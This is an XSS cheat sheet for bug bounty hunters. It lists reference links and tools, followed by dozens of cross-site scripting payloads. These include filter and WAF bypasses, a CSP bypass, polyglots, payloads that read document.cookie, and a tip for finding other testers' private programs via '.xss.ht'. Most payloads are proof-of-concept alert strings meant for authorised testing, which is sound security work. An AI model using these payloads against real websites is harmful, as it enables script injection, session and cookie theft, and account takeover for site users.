Cross Site Scripting (XSS)

References for Cross Site Scripting Attacks

Blogs / Articles:

• https://medium.com/@Ch3ckM4te/self-xss-to-account-takeover-72c89775cf8f

• Blind XSS - https://ardern.io/2019/06/20/payload-bxss/

• https://brutelogic.com.br/blog/xss-limited-input-formats/

• http://codegrazer.com/blog/7-reflected-xss.html

• https://www.shawarkhan.com/2017/09/exploiting-multiple-self-xsses-via.html

• https://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a

• https://blog.innerht.ml/the-misunderstood-x-xss-protection/

• https://smaranchand.com.np/2020/02/the-tricky-xss/

• https://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/

• https://infosecwriteups.com/automating-xss-identification-with-dalfox-paramspider-e14283bb7916

• https://www.bugcrowd.com/blog/the-ultimate-guide-to-finding-and-escalating-xss-bugs/?utm_campaign=XXS-Bug-Infl&utm_medium=social&utm_source=twitter

• https://blog.noob.ninja/story-of-a-parameter-specific-xss/

Upgrading Self XSS:

https://twitter.com/hackerscrolls/status/1299711808312356865

Tools / Cheatsheets:

• https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks

• BXSS tools - https://github.com/psych0tr1a/elScripto

• https://github.com/RenwaX23/XSS-Payloads

• https://github.com/terjanq/Tiny-XSS-Payloads

• https://github.com/payloadbox/xss-payload-list

• https://github.com/hahwul/dalfox

• https://netsec.expert/posts/xss-in-2021/

• https://github.com/kleiton0x00/XSScope

if you google ".xss.ht" you can find where others are testing and maybe reveal some priv programs. :P

Twitter Threads:

• https://twitter.com/soaj1664ashar/status/1175348157758287872

• https://twitter.com/intigriti/status/1181904057063133186

• https://twitter.com/SamuelAnttila/status/1223671857590652928 - PDF

• https://github.com/elkokc/reflector

• https://twitter.com/SamuelAnttila/status/1224803951758991360

• https://twitter.com/ShawarkOFFICIAL/status/910670264383557633

• Blind XSS tip -https://twitter.com/intigriti/status/1093468744079364096

• https://twitter.com/samwcyo/status/1138183504745902085

• https://twitter.com/vishnugadupudi/status/1184138040442097664/photo/1

Payloads:

<img ="=" title="><img src=1 onerror=alert(1)>"
<<img src=x onerror='prompt(1)'<
#BugBountyTip When you are dealing with XSS try to change the device or user-agent to Mobile you might get it work, in my case the homepage is different in devices the XSS is in username and the payload is Unicode UTF-16
XSS vector without >, \, 'alert', parentheses, quotes and spaces <svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//

thank you 
@brutelogic
...WAF Bypass: "><brute+onbeforescriptexecute=a=alert,a(1%26%23x29> #security #XSS #KNOXSS

onffocusofocuscfocusufocuss="prompt(1)" - useful when waf replaces things like 'focus' to null, leaving us with onfocus="prompt(1)" - https://twitter.com/zseano/status/837160885181243392
?x=<script%20src=data:&x=alert(1);>

One that should bypass some XSS filters, by 
@dsopas
 
<meter onmouseover="alert(1)"

Uppercase #XSS 
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
http://brutelogic.com.br/webgun/test.php?p=%3CSVG%20ONLOAD=%26%2397%26%23108%26%23101%26%23114%26%23116%281%29%3E

XSS bypass for a weak filter - riyaz walikar
<img src=x onerror="[]['constructor']['constructor']('ale'+'rt(0)')()">

var of "Function ('ale'+'rt(0)')()"

<svg>
<a xml:base="javascript:alert(1)//" href="#"><circle r="100" />
</svg>
//Firefox :) .- https://twitter.com/kinugawamasato/status/898950198826721280 

#XSS Tip Smiling face with sunglasses
I guess this one could solve all your HTMLi problems (regular, inline & JS block)

'"</Script><Html Onmouseover=(alert)(1) // - https://twitter.com/brutelogic/status/903987636448219136

This might lead to some fun XSS on status-code errors:
header("HTTP/1.0 999 <img src=x onerror=alert(1)>"); - https://twitter.com/fransrosen/status/912795907313356800


SomeTime It's Work!
#XSS #Payload

<sVg/oNloAd="JaVaScRiPt:/**\/*\'/"\eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))">

<iframe src=jaVaScrIpT:eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))>

"><svg/onload=alert(1)>
<img>/><svg/onload=alert(1)>
"></\/\</script><script>alert(1)</script>
"><script>alert("xss");</script>
<div onmouseover="alert('XSS');">Hello :) 
^ [My favorite one - works like 80% of the time for me].
</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
That's all for now that I'll share.
Enjoy the payloads too. ;)

x@x.com<--`<img/src=` onerror=alert("Friendly-XSS")> --!> 
or
<--`<img/src=` onerror=alert("Friendly-XSS")> --!>
https://twitter.com/DaherMohamed4/status/1277009961688719360

To test XSS + SQLi + SSTI/CSTI with the same payload use : 

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection 

"><svg/onload=prompt(5);> ==> for XSS 

{{7*7}} ==> for SSTI/CSTI

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

CSP Bypass,  script-src 'self' data:

<script ?/src="data:+,\u0061lert%281%29">/</script>

When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work

"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works

Finally found my first bug on 
@synack
..I am just loving it. 
Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*
https://twitter.com/ManasH4rsh/status/1358742847789232128?s=20

There is so much to learn about HTML and JS hacks from this code:

<svg/onload=throw/**/Uncaught=window.onerror=eval,&quot;;alert\501\51&quot;>

This is inspired by 
@garethheyes
 and will execute an 'alert(1)' without using parentheses, spaces or quotes!
 
 The Best XSS Polyglot! Police cars revolving lightPolice cars revolving light

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</stYle/</titLe/</teXtarEa/</scRipt/--!><h1>aa</h1>\x3csVg/<sVg/oNloAd=alert()//>\x3e



</a><a href=https://www.google.com>Test</a>

\"><<img onerror=alert(49609) src>

"><<img onerror=alert(49609) src>

https://github.com/TheKingOfDuck/easyXssPayload/blob/master/burpXssPayload.txt

HTML INJECTION + XSS INJECTION Heavy check mark

/<div+id=JavaScript>/<h1>_Y000!_

/<div+id=JavaScript>/<marquee>_Y000!_</marquee>

/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

Url/?color=
Payloas

"><svg/onload=alert(document.domain)>"

Url/?language=
Payload

%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

 Url/?redirect_url=
Payload

javascript:alert()

Without ">" (XSS)

<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--

<opening_tag>PAYLOAD</closing_tag>

<svg onload=alert(1)%20
<svg onload=alert(1)%0A
<svg onload=alert(1)%0C
<svg onload=alert(1)%0D
<svg onload=alert(1)%09

<opening_tag>PAYLOAD</closing_tag>

Bug : RXss 
Payload : "'`><\x00img src=xxx:x onerror=javascript:alert(1)>

Final payload:
<svg><animate onend=a\u006cert(1) dur=1s>

The final payload :
<a class="w-100" href=javascript:alert(document.cookie) // target=_self target="_blank">

Paylaod - \">'>\"><img/src/onerror=confirm(document.cookie)>

Cross mark "'><H1 on*>1
White heavy check mark "'><H1>1

Mi payload final fué:

"><details/open/ontoggle=prompt("/xss_by_Y000!/")>

<input/onfocus=prompt(document.domain) autofocus>

Some payloads that worked for me in popping up a stored XSS:-

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XSS/XSS-OFJAAAH.txt


“><<img onerror=alert(document.cookie) src>

• Did you know <a ping="url1 url2 url3 ..."> is a thing?

You can serve a XSS payload from a XML file: xss.xml: <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html="http://w3.org/1999/xhtml"> <html:script>prompt(document.domain);</html:script> </html>

DOM XSS - https://portswigger.net/blog/introducing-dom-invader

• XSS Tips - https://twitter.com/b4walid

• https://netsec.expert/posts/xss-in-2021/